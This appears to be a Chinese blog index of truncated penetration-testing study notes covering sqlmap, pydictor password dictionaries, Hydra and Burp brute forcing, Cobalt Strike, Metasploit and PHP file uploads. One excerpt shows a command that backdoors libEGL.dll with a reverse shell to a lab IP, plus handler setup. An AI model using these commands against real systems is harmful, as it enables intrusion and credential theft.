摘要:
Markdown学习 首先下载一个typora 标题: # 一级标题 记得加空格,几个#为几级标题,最多支持六级 一级标题 ## 二级标题 二级标题 ### 三级标题 三级标题 字体 **粗体** 粗体 *斜体* 斜体 ***斜体加粗*** 斜体加粗 ~~划掉~~ 划掉 引用 > 引用的话 右尖括号 阅读全文
摘要:
SQLMAP工具的使用 sql注入工具:明小子 啊D 萝卜头 穿山甲 sqlmap等等 开源自动化注入利用工具,支持12中数据库,在/plugins中可以看到支持的数据库种类 支持的注入类型:bool,时间,报错,联合,堆查询,内联 可以获取用户名 密码 权限 角色 数据库 (表,字段,内容) 可以 阅读全文
摘要:
社攻密码字典的生成(工具) Pydictor:强大的密码生成工具,合并密码字典,词频统计,去重,枚举数字字典. Python pydictor.py -base d --len 4 4 生成纯数字四位密码 Python pydictor.py -base L --len 4 4 -o name.tx 阅读全文
摘要:
./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H 192.168.106.137 msfconsle 打开msf 在msf 中 use exploit/multi/handler set payload window 阅读全文
摘要:
<?php header("Content-type:text/html;charset:utf-8"); if ($_FILES["file"]["error"]>0) { echo $_FILES["file"]["error"]."<br>"; } else { echo "文件名:".$_F 阅读全文
摘要:
远程控制: 控制端:运行在运行 Cobalt Strike 介绍:后渗透测试工具,基于java开发,适用于团队间协同作战,简称“CS” CS分为客户端和服务端,一般情况下我们称服务端为团队服务器,具有社会工程学攻击的方法和手段,团队服务器可以帮助我们手机信息以及管理日记记录。linux中需要以roo 阅读全文
摘要:
PHP 基础语法规范: 1 <?php 开头 ?>结尾 2 php可以单独存在也可以和html等结合使用 3后缀名一般以.php结尾 php4,php5,php6,php7,phtml. 4 php的配置文件一般为php.ini 开发PHP的环境准备 1.phpstudy 8 版本,php的版本可以 阅读全文
摘要:
使用BP和Hydra爆破相关的服务。 Hydra:九头蛇,开源的功能强大的爆破工具,支持的服务有很多,使用hydra爆破c/s架构的服务。使用bp爆破web登录端口。 dvwa:web应用程序漏洞演练平台,开源,集成的常见web漏洞,使用PHP+MYSQL环境的支持。 爆破=爆破工具(bp/hydr 阅读全文
摘要:
1 kali 基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是bt5r3(bractrack) 其中Metasploit是一个综合利用工具,极大提高攻击者渗透效率,使用ruby开发的,使用非常方便,进入该工具的方式:msfconsole,msf依赖与postgresql数据库,在使 阅读全文
摘要:
html:超文本标记语言,不是编程语言,是标签语言,显示数据。 有双标签和单标签 双标签:有开始有结束,<body></body> 单标签:只有一个。<img src=#/> 通过浏览器去解析HTML代码,在<body>标签中的数据会被显示出来。 基本格式 编辑器: VS code sublime 阅读全文